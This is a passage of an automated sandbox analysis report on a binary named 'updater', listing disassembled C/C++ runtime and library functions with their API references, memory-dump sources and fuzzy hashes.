                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0140978F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                    • String ID:
                                    • API String ID: 1973839345-0
                                    • Opcode ID: 8ab6024e8b3c3f56125be505d7ce27a6ba87dea3ae36d66441bca6e58ab23e8b
                                    • Instruction ID: d5175b3c8433113f91a24d5403c5548d10cf5719da5f4c4194228395105a6dfd
                                    • Opcode Fuzzy Hash: 8ab6024e8b3c3f56125be505d7ce27a6ba87dea3ae36d66441bca6e58ab23e8b
                                    • Instruction Fuzzy Hash: EF01C4769001169BCB16EF69D850ABEBBB1BFA4718F18041ED905673E2DF349A01CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0140967C
                                    • int.LIBCPMT ref: 01409693
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • moneypunct.LIBCPMT ref: 014096B6
                                    • std::_Facet_Register.LIBCPMT ref: 014096CD
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 014096ED
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 014096FA
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                    • String ID:
                                    • API String ID: 1973839345-0
                                    • Opcode ID: 3e29a027d393cc6d907b19ec22e1c0c7f5c4640e409efbb622dfafc79c807a0b
                                    • Instruction ID: 6503466445f710601c8168109b52b8d564b04985b01c6da4e1a89a736932b0b4
                                    • Opcode Fuzzy Hash: 3e29a027d393cc6d907b19ec22e1c0c7f5c4640e409efbb622dfafc79c807a0b
                                    • Instruction Fuzzy Hash: 3401F9759001169BCB02EBA9DC60AFE7B71FFA4328F14051ED909673E1DF349A01C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free_strpbrk
                                    • String ID: *?
                                    • API String ID: 3300345361-2564092906
                                    • Opcode ID: c2435c114784b797fa6856977d9cdf00b5fb06a9875519311553b62671703d1f
                                    • Instruction ID: 9e765051560a20a13ad7c368a3cdc1fe43c053c1ad392de45cf57dd4b1c7d66c
                                    • Opcode Fuzzy Hash: c2435c114784b797fa6856977d9cdf00b5fb06a9875519311553b62671703d1f
                                    • Instruction Fuzzy Hash: 84614E75E002299FDF15CFA9C8805EEFBF5EF58320B64816AD915F7310E635AE818B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: $column%d$rowid
                                    • API String ID: 4218353326-801954022
                                    • Opcode ID: 106a4f6c256df1ea013733fcfd242aabe38f291e9ac7f81c245b5eb63a7dc0ad
                                    • Instruction ID: cc570132245bc001331b76ec1a69a0ecda44d7fb5ddc09a030fabaed685de7c5
                                    • Opcode Fuzzy Hash: 106a4f6c256df1ea013733fcfd242aabe38f291e9ac7f81c245b5eb63a7dc0ad
                                    • Instruction Fuzzy Hash: 4F61AF71E0032A9FEF15CF98C884BAEBBF9BF54218F144159E945AB282D730ED41CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013B1730
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013B176D
                                      • Part of subcall function 013FA8A9: _Yarn.LIBCPMT ref: 013FA8C8
                                      • Part of subcall function 013FA8A9: _Yarn.LIBCPMT ref: 013FA8EC
                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 013B17AE
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013B181F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Locinfo::_LockitYarn$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                    • String ID: bad locale name
                                    • API String ID: 2090653598-1405518554
                                    • Opcode ID: b1f55d3f0af9866e01eebdef68991caf170727ebcae61dedef0a1b38fdd18c5a
                                    • Instruction ID: 040d876e924540812f7101d86f1d1c967ace83f075209d3d77ce32bd9c3bf7eb
                                    • Opcode Fuzzy Hash: b1f55d3f0af9866e01eebdef68991caf170727ebcae61dedef0a1b38fdd18c5a
                                    • Instruction Fuzzy Hash: 36318E72800B40DFC7359F1EE880696FBF4FF68A10B108A2FE19E87A50D770A501CB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,014127B7,?,?,0141277F,?,?,?), ref: 014127D7
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,014127B7,?,?,0141277F,?,?,?), ref: 014127EA
                                    • FreeLibrary.KERNEL32(00000000,?,?,014127B7,?,?,0141277F,?,?,?), ref: 0141280D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: e28576e28cb575e65e6429d344393d135e9d5c461e376841c2e1a11264c65de0
                                    • Instruction ID: 0fadfe4bc3cda4d60227b38b111f2b413659428d5cbda75816173adc5dcdd6f4
                                    • Opcode Fuzzy Hash: e28576e28cb575e65e6429d344393d135e9d5c461e376841c2e1a11264c65de0
                                    • Instruction Fuzzy Hash: B2F08271500219FBEB219BA5ED09F9EBE74EB44756F240165F900E21B4CBB08E00EB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0142E562,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0142E349
                                    • __alloca_probe_16.LIBCMT ref: 0142E3FF
                                    • __alloca_probe_16.LIBCMT ref: 0142E495
                                    • __freea.LIBCMT ref: 0142E500
                                    • __freea.LIBCMT ref: 0142E50C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __alloca_probe_16__freea$Info
                                    • String ID:
                                    • API String ID: 2330168043-0
                                    • Opcode ID: 815053d85941a805b24bf944f7615ba601991e2f133f1fec4eea0c78f643a188
                                    • Instruction ID: 093e4f99c38a1500ca0f31d62c77e975a5fb25a5e6d29e324ee83c3f04638a81
                                    • Opcode Fuzzy Hash: 815053d85941a805b24bf944f7615ba601991e2f133f1fec4eea0c78f643a188
                                    • Instruction Fuzzy Hash: 6E81D8719001369BEF219EA9C840EEF7FB5AF19615F98016BEA04BB360E735D9C1C760
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0142255C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0142838D,00000220,?,?,?,?,?,?,01413E8D,?), ref: 0142258E
                                    • _free.LIBCMT ref: 0141EAC5
                                    • _free.LIBCMT ref: 0141EADC
                                    • _free.LIBCMT ref: 0141EAF9
                                    • _free.LIBCMT ref: 0141EB14
                                    • _free.LIBCMT ref: 0141EB2B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$AllocateHeap
                                    • String ID:
                                    • API String ID: 3033488037-0
                                    • Opcode ID: f316e54840fc9bbfa81c60fd16930750199d863e1553edb74915c2afeda9339c
                                    • Instruction ID: 1aecb32edf19ed7f230238294c8ac6ba0817bca688a04957f4282777e6f8d45f
                                    • Opcode Fuzzy Hash: f316e54840fc9bbfa81c60fd16930750199d863e1553edb74915c2afeda9339c
                                    • Instruction Fuzzy Hash: 1C51F436A00315AFDB22DF6EC841A6B77F4FF58760F14456EE906E7264E731EA018B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0140CD10
                                    • __alloca_probe_16.LIBCMT ref: 0140CD3C
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0140CD7B
                                    • __alloca_probe_16.LIBCMT ref: 0140CDEF
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0140CE50
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$__alloca_probe_16
                                    • String ID:
                                    • API String ID: 2135360126-0
                                    • Opcode ID: 515501be82aeef8813784b7026a5046e3e4f84c6fdbafbbac8dffb8c72154f81
                                    • Instruction ID: b19a6d0b2f1a35809d71710b93f41751fed68e95b2794569f900a7fcf2785589
                                    • Opcode Fuzzy Hash: 515501be82aeef8813784b7026a5046e3e4f84c6fdbafbbac8dffb8c72154f81
                                    • Instruction Fuzzy Hash: ED51D472910206EBEF225F6ACC80FAB7FA9EF50A50F15467AEE05962E0D7358D11C7D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Lock$SleepUnlock
                                    • String ID:
                                    • API String ID: 1216273398-0
                                    • Opcode ID: aeb5443fd287d5e8ce8263c64bc7eed186561b02a6576b81ce09cc6f10235a7f
                                    • Instruction ID: c494454c0cf1c1038bae8821af0b25c05953113f681da2b7f4c889a859dcc206
                                    • Opcode Fuzzy Hash: aeb5443fd287d5e8ce8263c64bc7eed186561b02a6576b81ce09cc6f10235a7f
                                    • Instruction Fuzzy Hash: 1A31C9FA740715BBEB334A18AC817A9BAB0BB00B69F108125FE457B2C0D775DD50C782
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Maklocstr$Maklocchr
                                    • String ID:
                                    • API String ID: 2020259771-0
                                    • Opcode ID: 64c453e9ea6c0a0ff927e83b1916d954cf28d7949648e73b9c5e2c52e748bea5
                                    • Instruction ID: ef209d302630cd07c18430f00f9fada3e02e0cc6e8a2f6429de2f47810b61a94
                                    • Opcode Fuzzy Hash: 64c453e9ea6c0a0ff927e83b1916d954cf28d7949648e73b9c5e2c52e748bea5
                                    • Instruction Fuzzy Hash: 61118CF1900785BFE3209BA9C880F12FBACEF59618F04451EF2858BA40D374F85487A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC1D9
                                    • int.LIBCPMT ref: 013FC1F0
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013FC22A
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC24A
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC257
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: a499bfa064924954e5a76565ea678dcae702095a836f7212d229f20f39fa4832
                                    • Instruction ID: bb4efc17bc4b98610f40c6e12e08f9153d6852c4fb42e213372c6c6592864fb8
                                    • Opcode Fuzzy Hash: a499bfa064924954e5a76565ea678dcae702095a836f7212d229f20f39fa4832
                                    • Instruction Fuzzy Hash: 8A01047590011AABCF01EBA89814AFD7B74FFA4718F18050DEA15672E1DF309A01CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC398
                                    • int.LIBCPMT ref: 013FC3AF
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013FC3E9
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC409
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC416
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 6f051c7fe533a726fe2fd02a5c0b13d54b87b4c5ba401256b1b2b4055af16fbf
                                    • Instruction ID: 93ab3c22dbe064710bed2db6687d13c1f458e57412c9740d17860d6440c3f089
                                    • Opcode Fuzzy Hash: 6f051c7fe533a726fe2fd02a5c0b13d54b87b4c5ba401256b1b2b4055af16fbf
                                    • Instruction Fuzzy Hash: 2301D275D4021A9BCB12EBA8D854AFD7BB1BFA4358F18040DEA11BB2E0DF749E01C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC26E
                                    • int.LIBCPMT ref: 013FC285
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013FC2BF
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC2DF
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC2EC
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 938eb12cc7e405435cae4435f8fe8ac392f2eea2b37367315099585c15ffb005
                                    • Instruction ID: ca42b6215b98dc2ddd2a5a6ac7f478e6e6647f7c0643d3c6fad4a88d55ada317
                                    • Opcode Fuzzy Hash: 938eb12cc7e405435cae4435f8fe8ac392f2eea2b37367315099585c15ffb005
                                    • Instruction Fuzzy Hash: 1201C47590011AABCF01EBA89854ABE7B75FFA4319F14000DEA04A72D0DF349E01CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC303
                                    • int.LIBCPMT ref: 013FC31A
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013FC354
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC374
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC381
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 235448ff6519b5815258438a744f9f43a5d637f6af413fcc936b7ddc132b5b7a
                                    • Instruction ID: 7d9ed6d168d4c49c5b7745825ab7c4b78da3af22739ed432314d571e64d9deef
                                    • Opcode Fuzzy Hash: 235448ff6519b5815258438a744f9f43a5d637f6af413fcc936b7ddc132b5b7a
                                    • Instruction Fuzzy Hash: 9D01D67590011A9BCB11EB68D954ABDBBB4FFA4358F18010EEA00672E0DF349A01CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC716
                                    • int.LIBCPMT ref: 013FC72D
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013FC767
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC787
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC794
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: 23de93358a5fca0b52373bb68ff09c956e69fe108dfb063e6239375404869cb9
                                    • Instruction ID: 16559890b919090c72c21d5327b380e539ed1814e96469d5373474846b3907a8
                                    • Opcode Fuzzy Hash: 23de93358a5fca0b52373bb68ff09c956e69fe108dfb063e6239375404869cb9
                                    • Instruction Fuzzy Hash: F301C07590011AAFCB15EBA99850AADBB74BFA4328F28041DEA10A76E0DF749A45C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC7AB
                                    • int.LIBCPMT ref: 013FC7C2
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • std::_Facet_Register.LIBCPMT ref: 013FC7FC
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC81C
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC829
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                    • String ID:
                                    • API String ID: 2081738530-0
                                    • Opcode ID: b8a3f86fbe03336c8a3a59d59df1ce2153b00a51f7ce2ef0eacd4214cbed8e60
                                    • Instruction ID: a2a78cca68f455d48a3fa24cbe1f5af63cc34ab592877591f42be4193e462675
                                    • Opcode Fuzzy Hash: b8a3f86fbe03336c8a3a59d59df1ce2153b00a51f7ce2ef0eacd4214cbed8e60
                                    • Instruction Fuzzy Hash: B301227590011A9FCB01EB68D850AFDBBB0BFA432CF18051DEA10A72E1DF309E01C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC681
                                    • int.LIBCPMT ref: 013FC698
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
